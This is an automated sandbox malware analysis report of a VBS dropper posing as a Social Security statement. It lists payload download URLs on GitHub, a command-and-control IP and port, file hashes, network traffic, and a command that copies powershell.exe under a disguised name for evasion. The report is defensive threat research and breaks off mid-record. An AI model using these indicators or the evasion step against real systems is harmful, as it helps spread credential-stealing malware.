              https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll0%Avira URL Cloudsafe
              https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe0%Avira URL Cloudsafe
              https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exeSocial_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F6727C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://github.com/mgravell/protobuf-netiSocial_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://stackoverflow.com/q/14436606/23354Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F57431000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/mgravell/protobuf-netJSocial_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngSocial_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F57431000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlSocial_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F57431000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://stackoverflow.com/q/2152978/23354rCannotInstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://go.micropowershell.exe, 00000011.00000002.2138865205.00000181804F9000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://stackoverflow.com/q/11564914/23354;Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://stackoverflow.com/q/2152978/23354Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F6727C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exeSocial_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F6727C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/LicenseSocial_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F6727C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dllInstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/IconSocial_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F6727C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://github.com/mgravell/protobuf-netSocial_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67A8F000.00000004.00000800.00020000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2157071231.0000024F6FBF0000.00000004.08000000.00040000.00000000.sdmp, Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2110263849.0000024F67505000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/pscore68Social_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F57211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2138865205.0000018180047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2138865205.000001818005B000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSocial_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F57211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2138865205.0000018180031000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://github.com/Pester/PesterSocial_Security_Statement_Review.vbs.exe, 00000004.00000002.2060632755.0000024F57431000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exeInstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exeInstallUtil.exe, 00000010.00000002.2719376474.000001ADB1F48000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              176.150.119.15
              		unknownFrance
              		5410BOUYGTEL-ISPFRfalse

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1511959
              Start date and time:2024-09-16 16:34:56 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 7m 35s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:20
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:Social_Security_Statement_Review.vbs
              Detection:MAL
              Classification:mal100.bank.spyw.expl.evad.winVBS@25/8@0/1
              EGA Information:Failed
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .vbs

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target InstallUtil.exe, PID 5236 because it is empty
              • Execution Graph export aborted for target Social_Security_Statement_Review.vbs.exe, PID 1648 because it is empty
              • Execution Graph export aborted for target powershell.exe, PID 6268 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • VT rate limit hit for: Social_Security_Statement_Review.vbs

              Simulations

              Behavior and APIs

              TimeTypeDescription
              10:36:07API Interceptor70x Sleep call for process: Social_Security_Statement_Review.vbs.exe modified
              10:37:00API Interceptor41x Sleep call for process: powershell.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              176.150.119.15SecuriteInfo.com.Win64.DropperX-gen.12223.30462.exeGet hashmaliciousPureCrypterBrowse
                SecuriteInfo.com.Win64.BackdoorX-gen.26081.4831.exeGet hashmaliciousPureCrypterBrowse
                  g082Q9DajU.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, PureLog StealerBrowse
                    SecuriteInfo.com.Win64.CrypterX-gen.314.16026.exeGet hashmaliciousUnknownBrowse
                      SecuriteInfo.com.Win64.CrypterX-gen.314.16026.exeGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Win64.RATX-gen.957.30649.exeGet hashmaliciousPureCrypterBrowse

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          BOUYGTEL-ISPFRSecuriteInfo.com.Win64.DropperX-gen.12223.30462.exeGet hashmaliciousPureCrypterBrowse
                          • 176.150.119.15
                          SecuriteInfo.com.Win64.BackdoorX-gen.26081.4831.exeGet hashmaliciousPureCrypterBrowse
                          • 176.150.119.15
                          QvTbUiFWlo.elfGet hashmaliciousMiraiBrowse
                          • 31.33.186.152
                          g082Q9DajU.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, PureLog StealerBrowse
                          • 176.150.119.15
                          SecuriteInfo.com.Linux.Siggen.9999.17528.22528.elfGet hashmaliciousMiraiBrowse
                          • 89.95.144.222
                          i586.elfGet hashmaliciousUnknownBrowse
                          • 176.143.224.130
                          154.213.187.80-arm-2024-08-30T23_29_44.elfGet hashmaliciousMiraiBrowse
                          • 176.184.102.20
                          154.213.187.80-mips-2024-08-30T23_29_44.elfGet hashmaliciousMiraiBrowse
                          • 176.135.209.131
                          sora.m68k.elfGet hashmaliciousMiraiBrowse
                          • 80.214.139.57
                          sora.mips.elfGet hashmaliciousMiraiBrowse
                          • 176.145.139.249

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exePollosappnuevo.batGet hashmaliciousXWormBrowse
                            PollosAplicaccion.batGet hashmaliciousXWormBrowse
                              gcapi64.cmdGet hashmaliciousUnknownBrowse
                                fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dllGet hashmaliciousUnknownBrowse
                                  fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dllGet hashmaliciousUnknownBrowse
                                    file.exeGet hashmaliciousUnknownBrowse
                                      BrowserUpdater.lnkGet hashmaliciousUnknownBrowse
                                        Updater.lnkGet hashmaliciousUnknownBrowse
                                          ZG7UaFRPVW.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                            IN-34823_PO39276-pdf.vbeGet hashmaliciousRemcos, DBatLoaderBrowse

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Social_Security_Statement_Review.vbs.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe
                                              File Type:CSV text
                                              Category:dropped
                                              Size (bytes):3869
                                              Entropy (8bit):5.3635828336192946
                                              Encrypted:false
                                              SSDEEP:96:iqbYqGSI6o9xYsntpDxqKkWqmq1ftzHNYrKaq7BjwOIzQ0cmS0wmj0qD:iqbYqGcQtpDxqKkWqmq1ftzHuLqBTIzF
                                              MD5:213C70D1213208AF0643372F4120A9F5
                                              SHA1:9C4E85D7AEEDDC4EF0EBD2002869110B834CB53F
                                              SHA-256:9FC0D0E13928A61C424497F6DB9558ADC06DBB198BA7E0EA68DEB912EA65A6A0
                                              SHA-512:469A1B0F198ED3D4F327F46AC9932A2F7D16FB66F0B720425785B3B7CD9FEC21A1C34FD535E4A86900F6286C7719371F47824DBB08D55AB33555891E50969ADC
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\0827b790b8e74d0d12643297a812ae07\Microsoft.PowerShell.ConsoleHost.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d5

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                              Download File
                                              Process:C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):11608
                                              Entropy (8bit):4.890472898059848
                                              Encrypted:false
                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                              Malicious:false
                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.34726597513537405
                                              Encrypted:false
                                              SSDEEP:3:Nlll:Nll
                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                              Malicious:false
                                              Preview:@...e...........................................................

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_df0yqxvo.fka.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ioe5meem.1jo.psm1

                                              Download File
                                              Process:C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jq2or3tm.ot4.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kd5t4pbk.njz.ps1

                                              Download File
                                              Process:C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe

                                              Download File
                                              Process:C:\Windows\System32\cmd.exe
                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):452608
                                              Entropy (8bit):5.459268466661775
                                              Encrypted:false
                                              SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                              MD5:04029E121A0CFA5991749937DD22A1D9
                                              SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                              SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                              SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: Pollosappnuevo.bat, Detection: malicious, Browse
                                              • Filename: PollosAplicaccion.bat, Detection: malicious, Browse
                                              • Filename: gcapi64.cmd, Detection: malicious, Browse
                                              • Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse
                                              • Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse
                                              • Filename: file.exe, Detection: malicious, Browse
                                              • Filename: BrowserUpdater.lnk, Detection: malicious, Browse
                                              • Filename: Updater.lnk, Detection: malicious, Browse
                                              • Filename: ZG7UaFRPVW.exe, Detection: malicious, Browse
                                              • Filename: IN-34823_PO39276-pdf.vbe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:ASCII text, with very long lines (65536), with no line terminators
                                              Entropy (8bit):6.34673299328147
                                              TrID:
                                                File name:Social_Security_Statement_Review.vbs
                                                File size:2'289'532 bytes
                                                MD5:a7e0d6762e771f76218b38b4f4a5a521
                                                SHA1:0e148d6e964db3a3f1c3f9239f132d313372298e
                                                SHA256:413f94db284db86c6030ae2b1f57f875a754c6b1d45c0ed98846b5d9f740521d
                                                SHA512:740b84ad4426a4c084ea4a99db348827a17c4abbe7d1abac63fe5527fb53e53de20c8af3ce1d09ca095d92d02e0e5dbb177bd3efa5731ad41834d92df481545a
                                                SSDEEP:49152:G1l/ZGwg4cx41IPaHeixB6gxj+dKxJ8uG:5
                                                TLSH:75B501A21E30DEC8778865397EAD3560E3E0EEBB3C7786105257EB5E5B2A9411720F31
                                                File Content Preview:' 88RjMDPn2Y3+ucbt3/SGdoktvObQKQ3lDId6TYYraBPap3VI5YtCY9GDYj0qWOpqqYNf6QFPgsm3fSOrbYwG0lGzEjh+PpH+6lkVTcbPu7SdD6MCy38SiyWrkWdnlvVEfI/sd0Wx7GvyYf6nOjQD58JuDl3pBAbSoIcT0q0pllRj0NE24kNv7CM3D2qAalDwqKml+IiYW3eJGta9nhm+yMuqQ2pjzAV+/yI6sfScUTU2IioDhJ3My3RZrchts

                                                File Icon

                                                Icon Hash:68d69b8f86ab9a86

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 16, 2024 16:37:06.766185999 CEST4970956001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:06.774302959 CEST5600149709176.150.119.15192.168.2.9
                                                Sep 16, 2024 16:37:06.774502993 CEST4970956001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:06.776824951 CEST4970956001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:06.784334898 CEST5600149709176.150.119.15192.168.2.9
                                                Sep 16, 2024 16:37:06.791981936 CEST4970956001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:06.796828985 CEST5600149709176.150.119.15192.168.2.9
                                                Sep 16, 2024 16:37:28.180671930 CEST5600149709176.150.119.15192.168.2.9
                                                Sep 16, 2024 16:37:28.180788040 CEST4970956001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:28.188987970 CEST4970956001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:28.195563078 CEST5600149709176.150.119.15192.168.2.9
                                                Sep 16, 2024 16:37:33.211411953 CEST4971256001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:33.216633081 CEST5600149712176.150.119.15192.168.2.9
                                                Sep 16, 2024 16:37:33.216742992 CEST4971256001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:33.216846943 CEST4971256001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:33.221772909 CEST5600149712176.150.119.15192.168.2.9
                                                Sep 16, 2024 16:37:33.221863031 CEST4971256001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:33.227011919 CEST5600149712176.150.119.15192.168.2.9
                                                Sep 16, 2024 16:37:54.605451107 CEST5600149712176.150.119.15192.168.2.9
                                                Sep 16, 2024 16:37:54.605529070 CEST4971256001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:54.605902910 CEST4971256001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:54.610707998 CEST5600149712176.150.119.15192.168.2.9
                                                Sep 16, 2024 16:37:59.637155056 CEST4971356001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:59.642059088 CEST5600149713176.150.119.15192.168.2.9
                                                Sep 16, 2024 16:37:59.642131090 CEST4971356001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:59.642301083 CEST4971356001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:59.647360086 CEST5600149713176.150.119.15192.168.2.9
                                                Sep 16, 2024 16:37:59.647437096 CEST4971356001192.168.2.9176.150.119.15
                                                Sep 16, 2024 16:37:59.652669907 CEST5600149713176.150.119.15192.168.2.9

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:10:36:00
                                                Start date:16/09/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs"
                                                Imagebase:0x7ff786fd0000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:10:36:00
                                                Start date:16/09/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:cmd /c copy "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe" /Y
                                                Imagebase:0x7ff65c210000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:10:36:00
                                                Start date:16/09/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff70f010000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:10:36:03
                                                Start date:16/09/2024
                                                Path:C:\Users\user\Desktop\Social_Security_Statement_Review.vbs.exe
                                                Wow64 process (32bit):false
